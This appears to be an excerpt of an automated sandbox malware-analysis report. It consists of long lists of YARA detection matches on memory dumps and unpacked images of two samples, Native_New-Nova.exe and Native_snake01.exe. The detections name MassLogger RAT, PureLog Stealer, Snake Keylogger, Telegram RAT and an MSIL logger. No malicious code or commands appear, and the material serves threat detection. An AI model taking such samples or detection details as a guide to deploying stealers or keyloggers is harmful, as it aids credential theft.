                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.Native_snake01.exe.5e03c0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.4a50000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c1216.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.5100000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.5100000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70f20.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.Native_snake01.exe.5e03c0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c02f6.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70f20.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc02f6.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc1216.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc1216.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0f20.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c02f6.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0f20.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc02f6.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c1216.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.3625599331.00000000025C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3623925545.0000000002672000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3627009294.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3626598913.000000000263C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 7852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_snake01.exe PID: 7944, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 3000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_snake01.exe PID: 2524, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected MSIL Logger
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 7852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 3000, type: MEMORYSTR
                      Yara detected MassLogger RAT
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 7852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 3000, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Yara detected Snake Keylogger
                      Source: Yara matchFile source: 00000013.00000002.3626598913.0000000002531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3625599331.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.Native_snake01.exe.5e03c0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.4a50000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c1216.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.5100000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.5100000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70f20.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.Native_snake01.exe.5e03c0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c02f6.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70f20.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack, type: UNPACKEDPE
